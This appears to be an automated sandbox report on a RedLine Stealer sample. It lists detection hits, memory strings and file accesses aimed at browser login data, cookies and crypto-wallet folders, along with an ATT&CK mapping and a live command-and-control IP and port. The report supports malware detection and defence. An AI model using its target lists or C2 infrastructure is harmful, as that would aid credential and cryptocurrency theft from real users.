Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 4.2.UzQWEAhf9B.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UzQWEAhf9B.exe.3f46dc0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UzQWEAhf9B.exe.3f5ebe0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UzQWEAhf9B.exe.3f5ebe0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UzQWEAhf9B.exe.3f46dc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2058036481.0000000003F46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2165587760.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UzQWEAhf9B.exe PID: 5908, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UzQWEAhf9B.exe PID: 6720, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: UzQWEAhf9B.exe, 00000000.00000002.2058036481.0000000003F46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
Source: UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000003193000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $cq2C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: UzQWEAhf9B.exe, 00000000.00000002.2058036481.0000000003F46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: UzQWEAhf9B.exe, 00000000.00000002.2058036481.0000000003F46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000003193000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\wallets
Source: UzQWEAhf9B.exe, 00000000.00000002.2058036481.0000000003F46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000003193000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereumt
Source: UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000003193000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $cq6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior

Source: Yara match	File source: 4.2.UzQWEAhf9B.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UzQWEAhf9B.exe.3f5ebe0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UzQWEAhf9B.exe.3f46dc0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UzQWEAhf9B.exe.3f5ebe0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UzQWEAhf9B.exe.3f46dc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2058036481.0000000003F46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2165587760.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UzQWEAhf9B.exe PID: 5908, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UzQWEAhf9B.exe PID: 6720, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 4.2.UzQWEAhf9B.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UzQWEAhf9B.exe.3f46dc0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UzQWEAhf9B.exe.3f5ebe0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UzQWEAhf9B.exe.3f5ebe0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UzQWEAhf9B.exe.3f46dc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2058036481.0000000003F46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2165587760.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UzQWEAhf9B.exe PID: 5908, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UzQWEAhf9B.exe PID: 6720, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	11 Masquerading	1 OS Credential Dumping	231 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	3 Data from Local System	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	241 Virtualization/Sandbox Evasion	Security Account Manager	241 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	113 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
UzQWEAhf9B.exe	88%	ReversingLabs	ByteCode-MSIL.Spyware.Redline
UzQWEAhf9B.exe	39%	Virustotal		Browse
UzQWEAhf9B.exe	100%	Avira	HEUR/AGEN.1306292
UzQWEAhf9B.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
api.ip.sb	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	0%	URL Reputation	safe
http://schemas.datacontract.org/2004/07/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/envelope/	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/actor/next	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/CheckConnectResponse	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://ipinfo.io/ip%appdata%	0%	Avira URL Cloud	safe
https://ipinfo.io/ip%appdata%	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/EnvironmentSettings	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/CheckConnectResponse	1%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
http://tempuri.org/Endpoint/CheckConnect	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/EnvironmentSettings	2%	Virustotal		Browse
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	0%	Virustotal		Browse
http://185.222.58.236:55615	100%	Avira URL Cloud	malware
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
http://tempuri.org/Endpoint/VerifyUpdateResponse	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
http://tempuri.org/Endpoint/SetEnvironment	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/SetEnvironmentResponse	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/GetUpdates	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/CheckConnect	1%	Virustotal		Browse
http://tempuri.org/Endpoint/VerifyUpdateResponse	1%	Virustotal		Browse
http://tempuri.org/Endpoint/SetEnvironment	1%	Virustotal		Browse
https://api.ipify.orgcookies//settinString.Removeg	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/SetEnvironmentResponse	1%	Virustotal		Browse
http://tempuri.org/Endpoint/GetUpdatesResponse	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/GetUpdates	1%	Virustotal		Browse
http://185.222.58.236:55615/	1%	Virustotal		Browse
http://tempuri.org/Endpoint/VerifyUpdate	0%	Avira URL Cloud	safe
185.222.58.236:55615	100%	Avira URL Cloud	malware
http://tempuri.org/0	0%	Avira URL Cloud	safe
https://api.ipify.	0%	Avira URL Cloud	safe
http://185.222.58.236:55615	1%	Virustotal		Browse
http://tempuri.org/Endpoint/GetUpdatesResponse	1%	Virustotal		Browse
http://tempuri.org/Endpoint/VerifyUpdate	1%	Virustotal		Browse
https://api.ipify.orgcoo	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	1%	Virustotal		Browse
http://tempuri.org/0	0%	Virustotal		Browse
185.222.58.236:55615	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ip.sb	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.222.58.236:55615/	true	1%, Virustotal, Browse	unknown
185.222.58.236:55615	true	1%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ipinfo.io/ip%appdata%	UzQWEAhf9B.exe, UzQWEAhf9B.exe, 00000004.00000002.2165587760.0000000000402000.00000040.00000400.00020000.00000000.sdmp	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	tmpE548.tmp.4.dr, tmp1EDA.tmp.4.dr, tmp1ECA.tmp.4.dr, tmpAB16.tmp.4.dr, tmpAB27.tmp.4.dr, tmpAB37.tmp.4.dr, tmpE568.tmp.4.dr, tmp1EA9.tmp.4.dr, tmpE506.tmp.4.dr, tmpE517.tmp.4.dr, tmpE537.tmp.4.dr, tmpE4F6.tmp.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	tmpE548.tmp.4.dr, tmp1EDA.tmp.4.dr, tmp1ECA.tmp.4.dr, tmpAB16.tmp.4.dr, tmpAB27.tmp.4.dr, tmpAB37.tmp.4.dr, tmpE568.tmp.4.dr, tmp1EA9.tmp.4.dr, tmpE506.tmp.4.dr, tmpE517.tmp.4.dr, tmpE537.tmp.4.dr, tmpE4F6.tmp.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	tmpE548.tmp.4.dr, tmp1EDA.tmp.4.dr, tmp1ECA.tmp.4.dr, tmpAB16.tmp.4.dr, tmpAB27.tmp.4.dr, tmpAB37.tmp.4.dr, tmpE568.tmp.4.dr, tmp1EA9.tmp.4.dr, tmpE506.tmp.4.dr, tmpE517.tmp.4.dr, tmpE537.tmp.4.dr, tmpE4F6.tmp.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/CheckConnectResponse	UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.datacontract.org/2004/07/	UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX	UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettings	UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	UzQWEAhf9B.exe, UzQWEAhf9B.exe, 00000004.00000002.2165587760.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	UzQWEAhf9B.exe, 00000004.00000002.2168487722.000000000307F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmpE548.tmp.4.dr, tmp1EDA.tmp.4.dr, tmp1ECA.tmp.4.dr, tmpAB16.tmp.4.dr, tmpAB27.tmp.4.dr, tmpAB37.tmp.4.dr, tmpE568.tmp.4.dr, tmp1EA9.tmp.4.dr, tmpE506.tmp.4.dr, tmpE517.tmp.4.dr, tmpE537.tmp.4.dr, tmpE4F6.tmp.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/	UzQWEAhf9B.exe, 00000004.00000002.2168487722.000000000307F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/CheckConnect	UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	tmpE548.tmp.4.dr, tmp1EDA.tmp.4.dr, tmp1ECA.tmp.4.dr, tmpAB16.tmp.4.dr, tmpAB27.tmp.4.dr, tmpAB37.tmp.4.dr, tmpE568.tmp.4.dr, tmp1EA9.tmp.4.dr, tmpE506.tmp.4.dr, tmpE517.tmp.4.dr, tmpE537.tmp.4.dr, tmpE4F6.tmp.4.dr	false	URL Reputation: safe	unknown
http://185.222.58.236:55615	UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, UzQWEAhf9B.exe, 00000004.00000002.2168487722.000000000307F000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.ecosia.org/newtab/	tmpE548.tmp.4.dr, tmp1EDA.tmp.4.dr, tmp1ECA.tmp.4.dr, tmpAB16.tmp.4.dr, tmpAB27.tmp.4.dr, tmpAB37.tmp.4.dr, tmpE568.tmp.4.dr, tmp1EA9.tmp.4.dr, tmpE506.tmp.4.dr, tmpE517.tmp.4.dr, tmpE537.tmp.4.dr, tmpE4F6.tmp.4.dr	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/VerifyUpdateResponse	UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/SetEnvironment	UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, UzQWEAhf9B.exe, 00000004.00000002.2168487722.000000000307F000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/SetEnvironmentResponse	UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/GetUpdates	UzQWEAhf9B.exe, 00000004.00000002.2168487722.000000000307F000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	tmpE548.tmp.4.dr, tmp1EDA.tmp.4.dr, tmp1ECA.tmp.4.dr, tmpAB16.tmp.4.dr, tmpAB27.tmp.4.dr, tmpAB37.tmp.4.dr, tmpE568.tmp.4.dr, tmp1EA9.tmp.4.dr, tmpE506.tmp.4.dr, tmpE517.tmp.4.dr, tmpE537.tmp.4.dr, tmpE4F6.tmp.4.dr	false	URL Reputation: safe	unknown
https://api.ipify.orgcookies//settinString.Removeg	UzQWEAhf9B.exe, UzQWEAhf9B.exe, 00000004.00000002.2165587760.0000000000402000.00000040.00000400.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/GetUpdatesResponse	UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	tmpE548.tmp.4.dr, tmp1EDA.tmp.4.dr, tmp1ECA.tmp.4.dr, tmpAB16.tmp.4.dr, tmpAB27.tmp.4.dr, tmpAB37.tmp.4.dr, tmpE568.tmp.4.dr, tmp1EA9.tmp.4.dr, tmpE506.tmp.4.dr, tmpE517.tmp.4.dr, tmpE537.tmp.4.dr, tmpE4F6.tmp.4.dr	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/VerifyUpdate	UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/0	UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ipify.	UzQWEAhf9B.exe	true	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmpE548.tmp.4.dr, tmp1EDA.tmp.4.dr, tmp1ECA.tmp.4.dr, tmpAB16.tmp.4.dr, tmpAB27.tmp.4.dr, tmpAB37.tmp.4.dr, tmpE568.tmp.4.dr, tmp1EA9.tmp.4.dr, tmpE506.tmp.4.dr, tmpE517.tmp.4.dr, tmpE537.tmp.4.dr, tmpE4F6.tmp.4.dr	false	URL Reputation: safe	unknown
https://api.ipify.orgcoo	UzQWEAhf9B.exe	true	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/actor/next	UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.222.58.236	unknown	Netherlands		51447	ROOTLAYERNETNL	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1483383
Start date and time:	2024-07-27 06:56:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	UzQWEAhf9B.exe renamed because original name is a hash value
Original Sample Name:	357b2371c981675051594d5851dc7ca8.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/47@1/1
